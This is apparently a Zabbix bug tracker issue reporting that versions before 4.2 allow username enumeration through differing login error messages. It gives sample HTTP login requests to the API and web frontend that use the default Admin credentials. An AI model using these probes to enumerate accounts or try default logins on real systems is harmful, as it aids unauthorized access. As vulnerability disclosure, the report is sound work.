Uploaded image for project: 'ZABBIX BUGS AND ISSUES'
  1. ZABBIX BUGS AND ISSUES
  2. ZBX-16532

Zabbix before 4.2 allows User Enumeration

    XMLWordPrintable

Details

    • Incident report
    • Resolution: Duplicate
    • Minor
    • None
    • 4.4.0alpha1
    • API (A), Frontend (F)
    • None

    Description

      Zabbix before 4.2 allows User Enumeration. It is possible to enumerate application username based on different server responses (Login name or password is incorrect, Account is blocked for N seconds, No permissions for system access) using the requests to login.

      API Request

      POST /zabbix/api_jsonrpc.php HTTP/1.1
      Host: company
      Content-Type: application/json-rpc
      
      {
      "jsonrpc": "2.0",
      "method": "user.login",
      "params": {
      "user": "Admin",
      "password": "zabbix"
      },
      "id": 1
      }
      
      

      Web Interface Request

      POST /zabbix/index.php HTTP/1.1
      Host: company
      Content-Type: application/x-www-form-urlencoded
      
      name=Admin&password=password&autologin=1&enter=Sign+in
      

      Attachments

        Issue Links

          Activity

            People

              zabbix.dev Zabbix Development Team
              itsecurityco itsecurityco
              Votes:
              2 Vote for this issue
              Watchers:
              6 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: